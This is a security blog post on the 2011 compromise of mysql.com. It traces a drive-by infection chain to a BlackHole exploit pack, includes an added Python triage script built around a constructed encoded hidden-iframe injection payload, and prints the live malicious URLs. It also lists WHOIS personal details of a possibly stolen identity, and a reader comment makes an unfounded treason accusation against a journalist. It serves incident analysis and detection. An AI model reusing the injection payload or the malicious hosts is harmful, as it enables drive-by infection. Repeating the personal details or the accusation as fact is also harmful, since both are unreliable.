mysql.com hacked, infecting visitors with malware

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Our HackAlert 24x7 Website malware monitoring platform today indicated that mysql.com has been hacked and is currently serving malware. The highlighted section of the above screenshot is the injected script. Below is a video showing how visitors are infected when navigating to the site:


[Infection Chain]

Step 1: http://www.mysql.com

Causes the visiting browser to load the following:

Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011

This is the injection point: the attacker's code was added to a script that the site's pages already load, so every visitor fetches it along with the legitimate page. The entire content of the above .js file can be found here.

The injected section is shown in the above screenshot; the decoded version is shown below, and a text version is available here. The decoded script generates an iframe pointing to Step 3.

Step 3: http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Answers with a 302 redirect to Step 4. Note that the query string passes along the referer (HTTP_REFERER=http://mysql.com/) and an antibot_hash value, so the redirector knows which compromised site sent the visitor.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It fingerprints and exploits the visitor's browsing platform (the browser and its plugins: Adobe Flash, Adobe Reader for PDF, Java, ...), and upon successful exploitation silently installs malware on the visitor's machine. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform results in an infection.
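As an added example (not part of the original post, and not Armorize's HackAlert code), the script below performs offline the two checks this chain calls for: it undoes the string-encoding tricks such injections hide behind and lists iframe targets in a served .js file that point off-site, and it walks a redirect chain from a canned response table. The JavaScript samples, the first-party allowlist and the HTTP responses are constructed for the example; the real injected script is the one linked above, not this stand-in. The Step 3 URL is copied from the post as printed.

```python
"""Offline triage of a script-injection infection chain like the one above.

Added example: a check a site owner can run against a served .js file, a
query-string flattener for the traffic-direction URL, and a redirect walker
driven by a canned response table so everything runs without network access.
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for a site's analytics loader; the real s_code_remote.js
# is linked from the post and is NOT reproduced here.
CLEAN_JS = """
var s_account = "prod";
var s = s_gi(s_account);
s.trackDownloadLinks = true;
"""

# Constructed injected tail in the unescape("%3C...") style typical of 2011
# mass injections. The iframe target is shortened to the in.cgi?5 endpoint; the
# real Step 3 URL (STEP3 below) carries more parameters.
INJECTED_TAIL = (
    '\ndocument.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Ffalosfax.in'
    '%2Finfo%2Fin.cgi%3F5%22%20width%3D1%20height%3D1%20style%3D%22'
    'visibility%3Ahidden%22%3E%3C%2Fiframe%3E"));'
)
COMPROMISED_JS = CLEAN_JS + INJECTED_TAIL

# Step 3 URL exactly as printed in the post.
STEP3 = ("http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1"
         "&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/")

# Assumed allowlist of hosts the site is expected to frame or script.
FIRST_PARTY = {"mysql.com", "www.mysql.com", "dev.mysql.com"}


def decode_js_strings(js: str) -> str:
    """Undo the string-encoding tricks injected scripts commonly hide behind."""
    def _unesc(m):  # unescape("%3C...") / decodeURIComponent("...") -> literal
        body = re.sub(r"%([0-9A-Fa-f]{2})",
                      lambda h: chr(int(h.group(1), 16)), m.group(3))
        return '"' + body + '"'
    js = re.sub(r'(unescape|decodeURIComponent)\(\s*(["\'])(.*?)\2\s*\)', _unesc, js)

    def _fcc(m):  # String.fromCharCode(60,105,...) -> "<i..."
        return '"' + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))) + '"'
    js = re.sub(r"String\.fromCharCode\(([\d,\s]+)\)", _fcc, js)

    # \xNN and \uNNNN escapes inside string literals
    js = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda h: chr(int(h.group(1), 16)), js)
    js = re.sub(r"\\u([0-9A-Fa-f]{4})", lambda h: chr(int(h.group(1), 16)), js)
    return js


IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)


def injected_hosts(js: str, first_party=FIRST_PARTY):
    """(url, host) for every iframe target whose host is not first-party."""
    found = []
    for url in IFRAME_SRC.findall(decode_js_strings(js)):
        host = urlparse(url).hostname or ""
        if host and host not in first_party:
            found.append((url, host))
    return found


def tds_params(url: str) -> dict:
    """Flatten the query string of a traffic-direction URL such as Step 3."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}


# Canned responses standing in for live HTTP: the 302 from Step 3 to Step 4 is
# what the post reports; the 200 at main.php is assumed for the example.
FAKE_RESPONSES = {
    "http://falosfax.in/info/in.cgi?5":
        (302, "http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php"),
    "http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php": (200, None),
}


def follow_chain(start: str, responses=FAKE_RESPONSES, max_hops=10):
    """Walk redirects from `start`, returning [(url, status), ...] in order."""
    hops, url = [], start
    while url and len(hops) < max_hops:
        status, location = responses.get(url, (None, None))
        hops.append((url, status))
        if status not in (301, 302, 303, 307, 308) or not location:
            break
        url = location
    return hops


if __name__ == "__main__":
    for url, host in injected_hosts(COMPROMISED_JS):
        print("injected iframe ->", host, url)
        for hop, status in follow_chain(url):
            print("  ", status, hop)
    print("TDS referer gate:", tds_params(STEP3).get("HTTP_REFERER"))
```

In practice you would feed `injected_hosts` the bytes your monitor fetched for each script URL on a schedule, compare against the previous fetch, and alert on any new off-site iframe or script host; `follow_chain` would use real HTTP responses with redirects disabled, recording each hop and its referer so you have the full chain for the takedown request.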

At the time of writing, 4 out of 44 vendors on VirusTotal detect this piece of malware.


[The Attacker]

We don't know much at this point. The following is the information we have on the associated malicious domains. WHOIS registrant details are self-reported and unverified; they may be false or a stolen identity, so treat them as leads rather than attribution.

falosfax.in (Step 3)
Address: 212.95.63.201
Location: Germany / Berlin
Created On: 20-Jun-2011 13:17:05 UTC
Sponsoring Registrar: Transecute Solutions Pvt. Ltd. (R120-AFIN)
Registrant Name: CHRISTOPHER J KLEIN
Registrant Street1: 7880 SW 132 STREET
Registrant City: MIAMI
Registrant State/Province: Florida
Registrant Postal Code: 33156
Registrant Country: US
Registrant Phone: +1.3053771635
Registrant Email: cjklein54@yahoo.com
Admin ID: TS_14483505
Admin Name: CHRISTOPHER J KLEIN
Admin Organization: N/A
Admin Street1: 7880 SW 132 STREET
Admin City: MIAMI
Admin State/Province: Florida
Admin Postal Code: 33156
Admin Country: US
Admin Phone: +1.3053771635
Admin Email: cjklein54@yahoo.com
Tech Email: cjklein54@yahoo.com
Name Server: NS1.SKYNS1.NET
Name Server: NS2.SKYNS1.NET

truruhfhqnviaosdpruejeslsuy.cx.cc (Step 4)
Address: 46.16.233.108
Location: Sweden / Stockholm

As of now, the mysql.com website is still serving this exploit and malware.

We're in the process of contacting mysql.com. If anyone has contacts there, please drop us an email at wayne@armorize.com.

PS: Armorize is hiring presales in the bay area: http://www.linkedin.com/jobs/post?displayJobStatus=&jobId=1910971&split_page=1

52 comments:

Tazojin said...

So what if someone went to mysql.com? How would he get rid of it?

zerg_must_die said...

Does it infect every system or only Windows?

m_m said...

mysql.com acted very fast. The malcode in the .js has already been deleted.

Wayne Huang said...

Yes!

Wayne Huang said...

Just windows.

Wayne Huang said...

Sorry @90bbab3da568b956a3861e7a1ca45e6c , we haven't had time to analyze this part yet

David said...

So what file(s) should I look for to see if I might be infected?

Blabla said...

http://dev.mysql.com/doc/ was infecting also?

Fubart said...

Is the file monitor tool you used in the MySQL.com video available somewhere to purchase?

Srock321 said...

Hey Wayne,
Just wondering how did the .exe run all by itself when you visited the site? I mean it would require some sort of admin approval before it executes say on Windows 7 machines.

-Ganesh

✔ Unverified said...

Are you aware if this is limited to certain versions of windows and is it x86/x64 specific?

Wayne Huang said...

The exe is run by exploiting the browser with javascript / flash actionscript / PDF jscript / java exploit / etc. Many exploits have the ability to turn DEP off so they'd still work on Win7.

Wayne Huang said...

No, it's a little tool I wrote myself for demo purposes. Not good enough to be released, and also it relies on some of the features of our scanning VM. You can use tools from sysinternals--free and more powerful.

Wayne Huang said...

Look for and delete files starting with "xth" under: C:\Documents and Settings\your_user_name\Local Settings\Temp  (replace "your_user_name" with your login user name in Windows)

Wayne Huang said...

The blackhole exploit pack supports a wide variety of exploits, so the actual exploit you get served depends on the platform you use for browsing.

Wayne Huang said...

We have to check but yes should be, because it causes the browser to load the same infected file: http://dev.mysql.com/common/js/s_code_remote.js?ver=20091011

✔ Unverified said...

Thank you.

Srock321 said...

Was this exploit specific to any particular browser?

Therefore said...

If I started using Firefox inside a Sandboxie Sandbox, would I be protected? I.e., is that a good general practice?

fleg said...

Do you mean FileMon?

fleg said...

FileMon is discontinued, I think Process Explorer

Tamás Fehér said...

IT journalist Brian Krebs is proud that he had 5 days' advance knowledge of this very attack by the Russians and he did not notify either the FBI or the victim. Please assist Uncle Sam in bringing Mr. Krebs to military justice for treason and being an accomplice of foreign enemies in times of war. Please make sure he gets to rot in SuperMax for the rest of his life! I am appalled by the cavalier approach the USA takes versus organized cybercrime that is actually run by the Russian-ruffian and Chinese states.

How will the USA fulfill its duty to protect my Hungarian country within the mutual defence framework of NATO when the USA is crippled by red cyber-attacks? The fact that US citizens fail to report foreign schemes to attack US companies to the FBI speaks volumes of the moral decline of the USA. Over 150 years ago President Jackson said the USA was built upon universal respect for three institutions: the flag, motherhood and capital punishment. The third leg is very weak nowadays, else scum like Mr. Krebs would not dare to make profits by watching ruffian-Russian organized e-criminals attack US entities.

Walter said...

Some do that, but some not. If you have info on CVE database, you can see vulnerability's targets.

JJ said...

I have Windows 7, all updates, IE9, newest Java Version 7 (newest Flash), newest Norton 360 and so on..
Am I protected?

Thanks.

Greenfield said...

Wow what a nutjob you are.

Iwwaty Jtsysa said...

Malware, only one AV detected it.

Wayne Huang said...

Likely, if you also keep these up-to-date: a)  Adobe Flash b) Adobe PDF c) Java d) real player (if you have one)

Wayne Huang said...

That's generally a good practice as long as you do not access any private data or conduct transactions inside that sandbox. Basically that sandbox would be for browsing only. To access Gmail, Facebook, etc., use another sandbox that you don't use for browsing arbitrary websites.

Wayne Huang said...

The blackhole exploit pack serves different exploits depending on the browsing platform. In the video I used XP + IE 6 + Java, and therefore I was served with a corresponding exploit that would work against this particular combination. If I use a different combination I can be served with a different set of exploits.

Wayne Huang said...

Yes, process explorer is very useful. But for a demo it's too complicated and that's why I wrote the little tool.

Wayne Huang said...

Hi @Iwwaty Jtsysa what do you mean?

mauro said...

Hello Wayne, in the video, does the blackhole kit exploit a particular vulnerability in Java, or does it just use Java to execute an exe file like the classical case, but without the authorization pop-up?

Thanks, and sorry for my bad english

Vince said...

Would a visitor to the malicious site still be infected if his computer was fully up to date with all patches for Windows 7, IE9, flash, java, adobe reader etc?
thanks

xpz said...

I'll be happy to analyse the malware if you upload it somewhere.

Noobie said...

Nothing new, the Java exploit has been known for a while. The guys at MySQL should really check their security holes more often.

Marki said...

Would NoScript or other Firefox plugin prevent the infection?

Dan said...

Can we have a copy :)

empowerT said...

What is the latest?  Has mysql.com regained control?

eni said...

Does this work when downloading with wget for Windows? Because in this case Java and the web browser have nothing to do here, but wget does HTML consults...

Darpa said...

What is this?

Max said...

I visited that site, but I was taking computer infection precautions at the time - I was standing on a rubber mat inside a cardboard box and was wearing a cap made of aluminium foil on my head. Will that have been sufficient to protect my computer?

David Agustin said...

FileMon is now Process Monitor. Very, very powerful tool.

Anonymous said...

Hi Max! I like your "ANTIVIRUS way of life" :) I would do the same - I mean the box and the rubber mat are OK - but I'm not sure about the aluminium cap... Aren't you afraid that the "mysql.com" electrons (or even protons - who knows?) might jump through the aluminium directly into one's brain?!? Or maybe they already have and will stay there for EVER..!! making one a "mysql.com" ZOMBIE slave or something like that? No!! I will not use the aluminium cap - I will use a PLASTIC one! Ha... and just in case I will not visit that place :)

Anonymous said...

PS Wayne - good job! Max - good joke:)

Tired of malware. said...

I say start prosecuting the EVIL people who do this kind of thing. Find them; first offense 3 years maybe, IF they are proven guilty, but second offense life in prison without any hope of ever seeing a computer again.
They are not showing their intellect to be superior to others, though some do it for money. They are hurting innocent people, a LOT of innocent people, many poor people who cannot afford new computers or to lose their bank accounts due to keyloggers etc. FIND THEM. Prosecute them.

richard said...

I found your site about 2 weeks ago when I was struggling to get rid of a virus. I have a learned a lot! (though some of it is over my head) I got a lot of great help here, and at this website: http://myvirusremoval.com/

Vdagoldo said...

Hi Wayne,

Process explorer is cool but your file monitor tool is very easy to use and follow. Are you going to share this.. For us (IT), we need that type of tool which does not complicate things..

Haha said...

Life in prison??? What's the matter with you?

Anita Yang said...

Taiwan should be proud of Armorize! I think Proofpoint made a brilliant decision, and together we'll become a shining star in the world's fight against APT. For Armorize, this is our first home run, and there will be many more to come!
